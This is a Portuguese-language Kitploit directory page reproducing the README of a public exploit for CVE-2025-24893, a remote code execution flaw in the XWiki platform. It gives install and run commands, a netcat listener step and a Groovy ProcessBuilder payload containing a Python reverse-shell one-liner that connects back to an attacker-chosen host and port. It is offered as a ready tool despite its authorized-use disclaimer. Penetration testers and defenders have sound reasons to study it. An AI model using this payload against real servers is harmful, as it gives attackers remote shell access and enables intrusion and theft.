Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2025-24893 — Exploit modificado para CVE-2025-24893 | Kitploit
Ferramentas/GitHubGitHub/hackersonsteroids/cve-2025-24893
ExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubhackersonsteroids/cve-2025-24893

cve-2025-24893

Exploit modificado para CVE-2025-24893

Ver Repositório
5há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit CVE-2025-24893 XWiki RCE

Exploit Banner

Um script simples em Python3 para explorar a CVE-2025-24893, uma vulnerabilidade de execução remota de código na plataforma XWiki, usando uma macro assíncrona baseada em Groovy e um payload de reverse shell configurável.

⚠️ AVISO: Esta ferramenta é fornecida apenas para fins educacionais e de testes autorizados. O uso não autorizado contra sistemas que você não possui ou sem permissão explícita é ilegal e antiético.


Índice

  • Recursos
  • Requisitos
  • Instalação
  • Uso
  • Detecção e Fallback de Protocolo
  • Payload de Reverse Shell
  • Licença
  • Aviso Legal

Recursos

  • ✅ Detecta automaticamente se o alvo suporta HTTPS ou HTTP
  • ✅ Constrói um trecho de código Groovy ProcessBuilder para evitar as peculiaridades do Runtime.exec
  • ✅ Codifica em URL o payload da macro async+groovy do XWiki
  • ✅ Reverse shell configurável (host + porta)
  • ✅ Exibe o código de resposta HTTP para ajudar a verificar a entrega

Requisitos

  • Python 3.6 ou superior
  • Biblioteca requests
root@kitploit:~
pip install requests

Instalação

Clone este repositório:

root@kitploit:~
git clone https://github.com/hackersonsteroids/cve-2025-24893.git
cd cve-2025-24893

Uso

root@kitploit:~
./exploit.py <TARGET_DOMAIN> <LHOST> <LPORT>
  • <TARGET_DOMAIN> O host XWiki (ex.: wiki.example.local).

  • <LHOST> O IP da sua máquina atacante (onde seu listener está em execução).

  • <LPORT> Sua porta do listener (inteiro).


Exemplo

  1. Inicie um listener na sua máquina:
root@kitploit:~
nc -lvnp 4444
  1. Execute o exploit:
root@kitploit:~
./exploit.py wiki.vulnerable.local 10.0.0.5 4444
  1. Em caso de sucesso, verifique no seu listener netcat se uma shell foi recebida.

Detecção e Fallback de Protocolo

Antes de enviar o payload, o script:

  1. Tenta https://<TARGET_DOMAIN>
  2. Recorre a http://<TARGET_DOMAIN> se HTTPS falhar
  3. Encerra se nenhum dos dois estiver acessível

Isso ajuda a garantir compatibilidade com implantações de protocolo misto.


Payload de Reverse Shell

Por padrão, o script usa um one-liner em Python3:

root@kitploit:~
new ProcessBuilder(
  ['/bin/bash','-c',
   'python3 -c \'import socket,subprocess,os;'
   's=socket.socket();s.connect(("LHOST",LPORT));'
   'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
   'os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'']
).redirectErrorStream(true).start()
  • Você pode modificar a função build_payload() se precisar de uma shell diferente (ex.: Bash, Perl, PHP, etc.).

Licença

Este projeto está licenciado sob a Licença MIT. Consulte o arquivo LICENSE para obter detalhes.


Aviso Legal

Esta ferramenta foi projetada apenas para avaliação de segurança autorizada e fins educacionais. Os autores não se responsabilizam pelo uso indevido. Sempre obtenha permissão explícita antes de testar qualquer sistema alvo.

Baixar ferramenta